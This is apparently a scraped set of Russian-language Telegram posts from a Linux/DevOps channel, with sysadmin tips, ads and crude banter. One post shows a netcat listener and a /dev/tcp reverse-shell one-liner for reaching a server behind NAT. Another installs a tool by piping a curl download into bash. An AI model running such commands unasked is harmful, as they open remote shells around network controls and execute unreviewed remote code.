Bash Days | Linux | DevOps

🛢 В мире, где данные — новая нефть, растёт спрос на дата-инженеров. Ведь именно они знают, как такую нефть добывать, обрабатывать и хранить. И пока компании осознают потребность в этих специалистах, конкуренция на рынке низкая, а зарплаты — высокие. Освоить ключевые компетенции дата-инженера поможет онлайн-магистратура Нетологии и НИУ ВШЭ «Инженерия данных». За 2 года вы на практике изучите Python, Java, Scala, Kotlin и SQL, научитесь проектировать пайплайны и обрабатывать данные, работать с системами хранения данных и базами данных в облаке. Программа даёт широкий простор для переквалификации, поэтому после учёбы сможете перейти в MLOps, DevOps или менеджмент. Онлайн-формат позволяет учиться без отрыва от привычной жизни и совмещать занятия с работой. При этом у вас будет отсрочка от армии, льготы на проезд и все остальные бонусы очного обучения. Станьте магистром программной инженерии с дипломом одного из лучших вузов страны и получите веское преимущество при приёме на работу: ссылка Реклама. ООО "Нетология". ИНН 7726464125 Erid:LjN8KUqtM

Друзья мои, реакции на постах с пальцами знатно всех подзаебали, давайте их котиками заменим + срущих добавим, чтобы проявлять своё животное возмущение и недоумение. Если есть премка в телеге, размутим! жмякай 👇 https://t.me/boost/bashdays Всем кто жмякнул — вы котики! 😘 Ну а кто не жмякнул, вы тоже котики 🙃

Добрый день господа и дамы. Сейчас накидаю тебе интересную темку, которую частенько используют пентестеры в своей работе. Но темка это не только пентестерская, она вполне применима для рядовых админов и девопс инженеров. И порой я ей пользуюсь. ㅤ Многие знают Linux утилиту nc = netcat, вот с помощью нее можно подключаться к серверам у которых нет прямого айпи адреса, а есть только внутренний, либо все за NAT лежит. Темка называется — Reverse Shell. Про неё ты тоже всяко слышал. В подробности вдаваться не будем, потыкаем на практике чтобы тебе все стало понятно. У меня есть сервер в закрытом периметре без внешнего айпи адреса. Нужно выдать доступ левому инженеру из мухосранска, который подключиться к этому серверу и произведет работы на сервере. Как быть? Привязывать белый айпишник не вариант. Бастиона нет. SSH тоннели не канают. Тут-то на помощь и приходит netcat. Просим инженера из мухосранска запустить у себя:

root@fuck:/ nc -lvnp 2288

В ответ он получает строчку вида: Listening on 0.0.0.0 2288 -l = слушать входящие соединения -v = быть более подробным -n = использовать IP-адреса без DNS -p = порт Дальше я иду на сервер, который не имеет белого айпишника и запускаю на нём:

/bin/bash -i > /dev/tcp/айпи мухосранска/2288 0<&1 2>&1

Не забываем у инженера узнать его IP, чтобы подставить инженера его в команду. Все эти хуйни с перенаправлением 0<&1 2>&1 описывать не буду, ебаные премудрости, сто раз уже мусолили в постах. Если интересно, спроси у GPT. А дальше… магия! В мухосранске, там где запустили nc -lvnp 2288, произойдет такое:

Listening on 0.0.0.0 2288
Connection received on 147.45.73.123 50740
root@stage1:~#

У инженера сменится шелл с root@fuck на root@stage1 и он получит доступ к нашему закрытому серверу без белого айпишника. Ну охуенно же! Ну а дальше можно и админить всё это дело пользуясь всеми благами командной строки.

Для всего происходящего могут понадобиться рут права, поэтому сразу делаем на это погрешность.

Прошу отметить, что предоставленная здесь информация предназначена исключительно для образовательных и информационных целей. Я не призываю и не одобряю незаконные действия, и использование этой информации для незаконных целей запрещено. Читатели должны соблюдать законы своей страны и использовать свои навыки с уважением к этическим нормам и законам. Давай, увидимся! tags: #linux #networks #security — 🔔 @bashdays

DevOps со всех сторон: от компетенций и паттернов до формирования инфраструктуры и безопасности. 📍 Офлайн в Перми — в конференц-зале технопарка Morion Digital 🌐 Онлайн на VK Видео 📆 27 августа, 18:00 по местному времени (GMT+5), 16:00 (МСК, GMT+3) В программе — выступления инженеров билайна об инфраструктуре и работе DevOps на практике. Они расскажут: ✔ какими компетенциями должен обладать DevOps-инженер; ✔ как сформировать инфраструктуру инженерной компании; ✔ нужен ли компании единый пайплайн; ✔ как обеспечить удобство сервисов, избегая «театра безопасности». ❗️Начало митапа — 27 августа в 18:00 по местному времени (Пермь, GMT+5). Офлайн-участников ждем к 17:30. Онлайн-трансляция начнется в 16:00 (МСК, GMT+3). Регистрация — на сайте. Реклама. ПАО Вымпелком. ИНН 7713076301

Все мы прекрасно знаем, что для переключения пользователя есть su и sudo. Но не все знают про команду runuser. ㅤ Эта команда используется в скриптах, системных процессах, крон тасках и в контексте служб которые запускаются с привилегиями рута. А самое главное не требует ввода пароля. Пример:

runuser -u roman -- id

Ну и важно посмотреть help, чтобы жонглировать ключами. Там тебе и проброс шелла, сохранение/очистка переменных, псевдотерминалы и т.п. В скриптах предпочтительнее использовать именно runuser чем везде пихать su. Если у тебя нет привилегий root и нужно выполнить команду от имени другого пользователя, su для этого подходит лучше. А чем отличается su от sudo (+ это двойное тире) я писал в этом посте. Такие дела, изучайте… tags: #linux — 🔔 @bashdays

Так ребят, курса никакого нет, вы меня вынудили это делать. Я лишь пошёл на встречу, никого не заставляю, дал вам чо хотели. Двоек уже понаставил, моё почтение. С сентября уже песда, фейс ебать контроль будет и 2x к цене, так что пользуйся пока летней скидкой и моей больной жопой, домашки проверять то еще дело, я зауважал учителей в школах!

Да, 3.14здострадальные посты заходят намного эффективнее, видимо больную тему затронул 😏 Ладно, тут пост еще интересный от Tagd Tagd завалялся, внимание на 1С не обращаем, важен сам концепт. Поехали! БЕЗДУМНАЯ НАСТРОЙКА SSH по SSH МОЖЕТ ПРИВЕСТИ К ПОТЕРЕ КОНТРОЛЯ НАД СЕРВЕРОМ ㅤ Сегодня мы рассмотрим как переложить свою работу на чужие плечи, но чтобы ничего не сломалось. Я админю сервера с 1с. И очень часто разработчики просят перезагрузить какой-нибудь сервис или сервер. Вместо web-админок предлагаю использовать ssh-админки. Я им больше доверяю.

sudo vim /usr/local/bin/servcontrol

#!/bin/bash
trap '' SIGINT SIGTERM SIGHUP DEBUG
declare -i MULTICOLUMN=0
declare -ir CMD_COL=3 #command column
declare -ir DLY_COL=4 #delay column
declare -ir NOCONFIRM_COL=5
declare -i COLS=$(echo "cols"|tput -S)
declare -i NUM=0
declare -u ANS
function ini(){ echo '
# (autonum_1) : name_2 : command_3 : delay_sec_4 : [NO_confirm_5]
Exit menu       :exit:0:y
restart_postgres:systemctl postgresql restart:60
restart_1c_1541 :systemctl srv1cv83 restart:60
restart_1c_2541 :systemctl srv1cv83_2 restart:60
REBOOT__SERVER  :reboot:10
'|awk '!/^#/ && NF {print ++i ":" $0}'
}
function get_ini_col(){ ini|awk -F: -vn=$1 -vc=$2 '$1==n{print $c;exit}';}
function prn_sleep(){
  declare -i I=$1
  while [[ $I -gt 0 ]];do
    echo -ne "$I\033[0K\r"
    sleep .99
    I=$I-1
  done
}
[[ $MULTICOLUMN -eq 0 ]] && CMDE='cat' || CMDE='column -x -c$COLS'
declare -i MAX=$(ini |awk -F: '{m=$1}END{print m}')
while :;do
  clear
  ini|awk -F: '{print $1,$2,"delay",$4 }'|eval $CMDE
  read -p "select item number = "
  #protection
  NUM=$(echo $REPLY|sed 's/[^0-9]//g')
  if [[ $NUM -le 0 ]] || [[ $NUM -gt $MAX ]];then
    continue
  fi
  CMD=$(get_ini_col $NUM $CMD_COL)
  DLY=$(get_ini_col $NUM $DLY_COL)
  clear
  echo delay "$DLY"
  echo "$CMD"
  #confirmation
  if [[ -n $(get_ini_col $NUM $NOCONFIRM_COL) ]];then
    ANS="YES"
  else
    read -p "Type YES to confirm operation " ANS
  fi
  if [[ "$ANS" == "YES" ]];then
    clear
    echo "$CMD"
    prn_sleep $DLY
    $CMD
    exit
  else
    echo "Operation caneled"
    sleep 1
  fi
done
#--

Данный скрипт позволяет перезапустить postgres, сервисы 1с на первом или втором комплекте портов или ребутнуть весь сервак. Разбор скрипта делать не буду, если кому-нибудь будет интересно - напишу разбор отдельной статьей.

sudo chmod 755 /usr/local/bin/servcontrol

в файле /etc/ssh/sshd_config
Match User bashdays_tagd
    MaxAuthTries 3
    MaxSessions 1
    PasswordAuthentication no
    PermitEmptyPasswords no
    PubkeyAuthentication yes
    allowtcpforwarding no
    ForceCommand sudo /usr/local/bin/servcontrol
#--

sudo service sshd restart

Ну, и самое главное. Чтобы эта вся фигня заработала, нужно либо запускать скрипт от root, либо разрешить выполнение скрипта под sudo без пароля для этого пользователя/группы. Добавляем запись в конец файла /etc/sudoers. Она позволит запускать указанный скрипт пользователю bashdays_tagd с привилегиями root. Следовательно, все команды в скрипте будут работать.

sudo vim /etc/sudoers

bashdays_tagd ALL=(ALL) NOPASSWD: /usr/local/bin/servcontrol

После подключения ssh bashdays_tagd@host.name Пользователь видит интерактивное меню со списком команд, которые может выбрать. И все! Команда reboot в скрипте выполняется с задержкой в 5 минут. Это сделано для того, чтобы нельзя было ребутить сервак в быстром цикле. По идее 5 минут должно хватить, чтобы отключить учетку хакнутого/сумашедшего пользователя или отредактировать sshd_config или sudoers. man sshd_config man sudoers tags: #bash #linux — 🔔 @bashdays

Айти убивает! Господа и дамы, если сидите за компьютером, не забрасывайте ноги на стол и т.п. Будущее такое — искривление жопы, защемление нервов, невролог, мягкая подушка в виде ободка унитаза и хуй пойми еще что после мрт. Наверное витамин Б, физкультура и какой-нибудь Бруфен с пластырями-гасителями. Технический пост будет завтра. Кому по домашкам не ответил, завтра с утра напишу, сорян. День пиздень, я нахуй в шоке, где мои 17 лет на Большом Каретном... Берегите себя и свои жопы Ииииии Самое главное сидите на своей жопе ровно 😲 Даже если упал прод — никогда не стрессуй, прод сам поднимется. Никакие деньги мира тебе не вернут твои нервы. И даже если только ты можешь всё это гавно починить, не суетесь, покури. Мир подождет пару минут или часов, пока ты думаешь. Ты лучший/ая! Всех обнял ❤️

⁉️ Хотите настроить гибкий роутер на базе Linux-машины, но не знаете, с чего начать? Сталкиваетесь с трудностями в настройке маршрутизатора и предоставлении доступа в Интернет для локальной сети? Чувствуете, что вам не хватает знаний для уверенной работы с сетевыми настройками? ❗️Это поправимо! Представьте, что вы знаете, как правильно настроить маршрутизатор, предоставлять доступ в Интернет для локальной сети и настраивать сетевой фильтр. Ваши навыки востребованы и вы уверенно справляетесь с любыми задачами сетевой конфигурации. Присоединяйтесь к открытому вебинару 12 августа в 19:00 мск и сделайте этот прыжок в будущее! 🎙 Спикер Николай Лавлинский — PhD Economic Sciences, опытный разработчик, автор курсов по администрированию и оптимизации веб-приложений, ведущий каналов «Ускорение сайтов» и «Поддержка сайтов». ➡️Запишитесь на вебинар и прокачайте свои навыки работы с сетевыми настройками в Linux: https://vk.cc/cz4hnG Реклама. ООО «Отус онлайн-образование», ОГРН 1177746618576, www.otus.ru

Есть у меня гит репка с Bash скриптами на все случаи жизни, появилась необходимость при очередном коммите, проверять измененные скрипты с помощью shellcheck и дизейблить коммит если я накосорезил. Сейчас автоматизируем ㅤ Про shellcheck я писал отдельный пост. Короче он у тебя должен быть установлен. Дальше создаем файл .git/hooks/pre-commit в репозитории, в котором нужно запускать проверку и пишем в него:

#!/bin/bash

bash_scripts=$(find . -name "*.sh")

for script in $bash_scripts; do
    shellcheck "$script"
    if [ $? -ne 0 ]; then
        echo "Shellcheck failed on $script. Commit aborted."
        exit 1
    fi
done

exit 0

Хуй знает, работает этот код или нет, я давно им не пользовался, главное тут концепт. Делаем это исполняемым:

chmod +x .git/hooks/pre-commit

Теперь перед каждым коммитом будет выполняться shellcheck для всех Bash-скриптов в репозитории. Если shellcheck найдет ошибки, твой коммит не пройдет, пока не пофиксишь. По началу это напряжно, но потом понимаешь что у тебя уже вырабатывается какой-то кодстайл и ты не можешь распиздяйничать. Если у тебя скрипты имеют другое расширение, соответственно меняешь его в переменной bash_scripts.

Помню в компании была подобная штука на проверку puppet кода, пиздец, я там орал как белуга не понимая что эта тварь от меня хочет. По итогу когда я возглавил отдел, выкосил это дермище вместе с puppet.

Бонусом адаптация под проверку ansible плейбуков:

#!/bin/bash

playbooks=$(find . -name "*.yml" -o -name "*.yaml")

for playbook in $playbooks; do
    ansible-lint "$playbook"
    if [ $? -ne 0 ]; then
        echo "ansible-lint failed on $playbook. Commit aborted."
        exit 1
    fi
done

exit 0

В зависимостях — нужно установить ansible-lint. С помощью pre-commit можешь любую хуйню замутить и усложнять себе жизнь в геометрической прогрессии, А вообще pre-commit нахуй не нужен, он помещает тебя в рамки и ты теряешь свободу в творчестве. Пользуйтесь. tags: #bash #git — 🔔 @bashdays

Научись находить уязвимости быстрее злоумышленников. Практикум по управлению уязвимостями от Positive Technologies. Неинформативные отчеты, незамеченные критические уязвимости, сложности в общении ИБ и IT – это только часть проблем, мешающих организовать полноценный процесс управления уязвимостями. С этими и другими задачами мы разбираемся на курсе. Наша цель – передать тебе свой опыт в построении эффективного процесса управления уязвимостями. Что тебя ждёт на практикуме? ·      16 часов онлайн-занятий: получишь знания от ведущих экспертов. ·       8 часов практики на стенде MaxPatrol VM: отточишь полученные знания на практике. ·    12 часов общения с экспертами: закрепишь полученный опыт. 8 сентября стартует новый поток курса. Регистрируйся сейчас и получи бесплатный доступ к вводной части курса.

🐿 Бурундук ебал фундук. Короче. Я привык что на винде, касперский регулярно предлагает мне избавиться от дубликатов файлов. Никогда этой хуйнёй не пользовался, но тут чет скучно стало, решил потыкать. Потыкал, понравилось. ㅤ Минусы иметь винт на 10 терабайт — повторно качаешь взрослые фильмы, которые уже качал 3 года назад, но найти не можешь. Ну и понеслась… А на linux чо делать? Есть такая штука — fdupes называется. Натравливаешь её на нужный каталог и получаешь кайф:

fdupes -r ~/Downloads

По выхлопу:

./music/Blind Guardian Bright Eyes.mp3
./mp3/Blind Guardian Bright Eyes.mp3

Опа, в папках music и mp3 идентичные файлы, значит один из них точно можно ёбнуть! Но чо руками что ли это делать? Неа!

fdupes -d ~/Downloads/*

Тебе вывалит интерактивный режим:

Set 1 of 1:

  1 [ ] /tmp/Downloads/music/Blind Guardian Bright Eyes.mp3
  2 [ ] /tmp/Downloads/mp3/Blind Guardian Bright Eyes.mp3

Но вообще если не боишься, запускай:

fdupes -r -d -N ~/Downloads/*

Как говорится, если ты не знаешь что у тебя хранится на диске — значит оно тебе нахуй не нужно. Так что посмелее!

После отработки получаем:

   [+] ~/Downloads/music/Blind Guardian Bright Eyes.mp3
   [-] ~/tmp/Downloads~/mp3/Blind Guardian Bright Eyes.mp3

В папке ~/Downloads/music файл остался, а вот в в папке mp3 похерился. Работает эта штука - Очень шустро! И зашла она мне прям люто, аналогично как ncdu из этого поста. Ставится элементарно:

apt install fdupes

+ у ней дофига ключей, вызывай help и изучай, чо там только нет. Ссылка на репку: https://github.com/adrianlopezroche/fdupes Но есть алтернативы шутрее: Бенчмарки 8vCPU/30G (54,000 files 17Gb)

fdupes takes 2m 47.082s findup takes 13.556s jdupes takes 0.165s

Либо наш любимый find со своей кишкой из аргументов. Выбор за тобой! Давай, увидимся! tags: #utilites #linux — 🔔 @bashdays

❔ Какие три характеристики лежат в основе эффективной IT-инфраструктуры? 🔵Наблюдаемость 🔵Безопасность 🔵Производительность Но при нехватке профессионализма эти три характеристики могут легко превратиться в три проблемы. О том, как совершенствовать производительность, укреплять безопасность и повышать наблюдаемость систем вы узнаете на конференции «OTUS CONF: Инфраструктура». ⭐️Спикеры – эксперты из ведущих компаний: девопс-инженер, технический директор и архитектор Важно: перед конференцией мы хотим узнать, что волнует вас на самом деле. Поэтому скорее переходите по ссылке внизу и заполняйте форму с вопросами спикерам. На самые интересные вопросы ответим в конце события! 🌟Бонус! Участников конференции ожидают полезные призы. Подробности – на странице мероприятия. Приглашаем девопс-инженеров, фулстек-разработчиков, системных и сетевых админов. архитекторов ПО, менеджеров продуктов и проектов. 8 августа, 19:00 МСК Участие бесплатное ➡️ Записаться на конференцию Реклама. ООО «Отус онлайн-образование», ОГРН 1177746618576, www.otus.ru

Здрасти, здрасти, давно не виделись. Сегодня… Аааа по ходу дела разберемся, погнали! Есть у меня текстовый файл, вида:

bashdays.ru/1
bashdays.ru/2
bashdays.ru/3
bashdays.ru/4
bashdays.ru/5

И есть условный bash скрипт, который должен прочитать этот файл и присвоить значения переменным, чтобы получилось так:

$1 = bashdays.ru/1
$2 = bashdays.ru/2
$3 = bashdays.ru/3
$4 = bashdays.ru/4
$5 = bashdays.ru/5

Сначала прикидываем в голове алгоритм — читаем файл построчно, цикл вся хуйня, делаем что-то на подобии массива и дальше по накатанной. Это всё понятно, классика. Но решим мы её как обычно через жопу:

#!/bin/bash

n=$(<bashdays.txt)
set -- $n

echo $1 # bashdays.ru/1
echo $2 # bashdays.ru/2
echo $3 # bashdays.ru/3
...
echo $@ # bashdays.ru/2 bashdays.ru/3 ...

Охуенно? ДА! Теперь давай разберем чо происходит. В переменную «n» зачитываем рэпчанский текстовый файл bashdays.txt с нашим списком урлов.

Как сказал Паук — Рэп это кал!

Это так, к слову, если любишь рэп — ничо против не имею. Конструкция $( < ) аналогична команде «cat», выполняет замену с подстановкой == $(cat bashdays.txt). По итогу переменная «n» содержит в себе весь текст из файла bashdays.txt Ну а магическая поебень set -- $n устанавливает позиционные параметры на основе содержимого переменной «n». То есть решает нашу задачу. Символ «--» перед set = сброс всех предыдущих позиционных параметров и установка новых. Можно конечно сделать проще, но проще это не для нас:

cat bashdays.txt | xargs ./script.sh

Тут содержимое файла bashdays.txt передается в скрипт и скрипт получает эти параметры в качестве аргументов.

#!/bin/bash

echo $1
echo $2
echo $3
echo $@

Итого получаем аналогичную картинку:

bashdays.ru/1
bashdays.ru/2
bashdays.ru/1 bashdays.ru/2 ...

Такие вот дела, накидывайте в комменты еще варианты упоротых решений, простые не интересны. tags: #bash — 🔔 @bashdays

Ой чо я вам принёс ребят… очередную хуиту 🥳 Называется эта хуета QEMU-QuickBoot и написана она на Bash. Скрипт создан для упрощения развертывания QEMU виртуалок с интуитивно понятным интерфейсом. Короче для всех любителей потыкать хомяка мышкой. ㅤ Штука позволяет быстреьнко создавать и загружать виртуальные машины используя физические устройства либо исошники, имейджи и т.п. BIOS/UEFI вся хуйня. В зависимостях там Zenity, хуй знает чо это такое, но нужно. Предварительно это надо поднять через апт инсталл если совсем на пол шестого. Потыкал, чето даже работает. Загнивающий запад с реддита пищит, ну хуй знает, попробуем... Репка со всеми подробностями тут 👇 https://github.com/GlitchLinux/QEMU-QuickBoot/ ps: в любом случае можно форкнуть спиздить и использовать в своих поделках, даж реверсить ничо не надо, скрипты, хули… tags: #utilites — 🔔 @bashdays

Последние новости — В Москве госпитализировали мужика, который не смог настроить GoodbyeDPI и похавал без ютуба. А ты настроил? 😲 Вот так вот и живем, а сегодня Tagd Tagd снова в тренде 👇 — Сегодня (01.08.2024) запускаю скрипт архивирования и получаю сообщение об ошибке:

bash: declare: 08: слишком большое значение для основания (неверный маркер «08»)

Скрипт, написанный и работающий с 02.02.24г вдруг перестал работать. Чудеса? ㅤ Лезу, смотрю, где ошибка.

declare -i MON=$(date +%m)

Мне нужен просто номер месяца для контроля, какой накопитель должен быть примонтирован. Начинаю выяснять. Оказывается, числа, начинающиеся с "0", а bash считает восьмеричными. Понятное дело, 08 для восьмеричной системы великовато. Ну, решений проблемы море. 0. Самый правильный вариант (подсказал Alexey Kuznetsov)

declare -i MON=$(date "+%-m")

1. Классический вариант

declare -i MON=$((10#$(date "+%m")))

10# - система счисления. Роман об этом уже писал. Но, читаемость (понимаемость) строки - так себе. 2. Более читаемый

declare -i MON=$(date "+%m"|sed 's/^0//')

Просто уберем ведущий "0" и проблема решена. 3. Решение на awk. Пробую пробую на своей машине:

declare -i MON=$(awk 'BEGIN{m=+strftime("%m");print m}')

Работает. Встраиваю в скрипт - ошибка

awk: line 2: function strftime never defined

Поверяю версии awk. У меня на машине gawk, на серваке mawk. Блин, это уже вызов. mawk - не gawk и у него отсутствуют функции времени и даты (ну, по крайней мере в той версии). Но, решение есть.

declare -i MON=$(date "+%m"|awk '{print $1+=0}')

Странная инструкция $1+=0 позволяет преобразовать строковое представление числа в первой колонке в числовое. Ну, собственно все. В коментах надеюсь увидеть другие варианты решения проблемы. tags: #linux — 🔔 @bashdays

🏫 Как оптимизировать работу на компьютерах в школах и университетах? Яндекс создал специальный Браузер для образования с учётом потребностей учебных заведений. Более 1000 образовательных учреждений уже используют его. В браузере доступны дополнительные функции, которые помогут оптимизировать работу 👩🏻‍🏫 О том, как его установить и настроить на компьютерах Windows и Linux, расскажут на онлайн-вебинаре, который состоится 8 августа в 11:00 по Мск. Зарегистрироваться на него можно здесь ⬅️

Здрасти, я потихоньку прихожу в себя после всех этих поездок. К концу недели глядишь раскачаюсь и войду в привычный ритм. Ну а пока читаем пиздатые посты от Tagd Tagd 👇 Сегодня мы рассмотрим как ДЛЯ СЕБЯ запилить SOCKS VРN через ssh. Допустим у вас есть виртуалка на зарубежном хостиге с ssh. (на pq 450р/мес.) ㅤ А вы человек добрый, почти как я, и решили поделиться счастьем с женой и детьми. Но давать доступ к консоли страшно, вдруг что-нибудь сломают.

БЕЗДУМНАЯ НАСТРОЙКА SSH по SSH МОЖЕТ ПРИВЕСТИ К ПОТЕРЕ КОНТРОЛЯ НАД СЕРВЕРОМ. Чтобы минимизировать риски, я подключаюсь по ssh двумя сессиями. В одной правлю sshd_config, другую оставляю для возможного отката при косяках, поскольку при перезапуске sshd с измененным конфигом текущие сессии сохраняются. Наличие физического доступа к консоли - приветствуется. sudo cp /etc/ssh/sshd_config /etc/ssh/sshd_config.$(date +%Y%m%d-%H%M%S)

Вы уже знаете, как настроить ключи. И они прописаны и работают!!! Есть несколько способов безболезненно раздать vрn на свою семью. В файле /etc/ssh/sshd_config

Match User bashdays_tagd
# или Match Group proxy
    MaxAuthTries 3
    MaxSessions 0 
    PasswordAuthentication no
    PermitEmptyPasswords no
    PubkeyAuthentication yes
    allowtcpforwarding yes 
#--

sudo service sshd restart

Если иcпользуете группу — не забудьте добавить в нее пользователя:

sudo usermod -aG proxy bashdays_tagd

При параметре MaxSessions 0 будет запрещен доступ к shell и sftp. Но разрешен проброс портов. На клиенте:

ssh -N -D 5000 bashdays_tagd@ssh.host.name

После запуска и ввода фразы ключа программа ничего не выводит, а потом, при использовании начинают сыпаться какие-то ошибки, ну и ладно. Если прервать команду, соединения в браузере разорвутся. В firefox:

Настройки -> Настройка сети -> Параметры соединения Ручная настройка прокси. SOCKS5. 127.0.0.1 порт 5000. Галка — Отправлять DNS-запросы через прокси при использовании SOCKS 5 или:

ssh -N -D 192.168.1.57:5000 bashdays_tagd@ssh.host.name

Если ваш адрес 192.168.1.57 и вы, человек еще более добрый чем я, и решили поделиться VРN со всей своей локалкой (в которой сидит еще и тёща с тестем): В настройках firefox нужно будет заменить 127.0.0.1 на 192.168.1.57 Продолжение следует... tags: #linux — 🔔 @bashdays

Привет, пока я летаю, рекомендую обратить внимание на эту софтину. ✔️ goManageDocker Это инструмент для управления docker’ом через интерфейс командной строки. Разработан он для ленивых жоп (как я), которые в рот ебали вводить длинные консольные команды для получения желаемого. ㅤ

Обычно после отпуска нахрен забываешь весь этот чудо docker синтаксис и приходится вновь лезть в интернет за мануалом — докер для чайников.

Ну дак вот GMD всю эту работу берет на себя, тыкай горячие кнопки и рули своими образами и контейнерами. Прям мастхевная хуёвина для каких-то своих пет-прооектов. Для разработчиков прям пушка, поставил локально и не ебись с консолькой. Ставится элементарно:

bash -c "$(curl -sLo- https://raw.githubusercontent.com/ajayd-san/gomanagedocker/main/install.sh)"

Репка тут: https://github.com/ajayd-san/gomanagedocker tags: #utilites — 🔔 @bashdays

100% кешбэк за Kubernetes и базы данных в Selectel Разверните свой проект в Selectel и пользуйтесь PaaS-сервисами с кешбэком. Подключите отказоустойчивые и масштабируемые кластеры Managed Kubernetes и облачных баз данных, а мы вернем бонусами 100% от суммы за первые 30 дней использования сервисов. Selectel — ведущий российский провайдер IT-инфраструктуры с облаком собственной разработки. Лидер среди провайдеров Kubernetes и облачных баз данных, по версии CNews. Преимущества PaaS-сервисов в Selectel: ▪️ Отказоустойчивость. Гарантируем доступность и стабильную работу сервисов за счет отказоустойчивого кластера. ▪️ Масштабируемость. У нас всегда есть ресурсы для масштабирования и роста ваших проектов. ▪️ Экосистема продуктов. 40+ сервисов для создания проектов любого масштаба и сложности. ▪️ Простое управление. Работайте с кластерами через панель, Terraform-провайдер или API. Участвуйте в акции и верните 100% затрат на Kubernetes и базы данных. Подробные условия по ссылке: https://slc.tl/rl6wi Реклама АО «Селектел». ИНН: 7810962785 Erid: 2VtzqwWZojg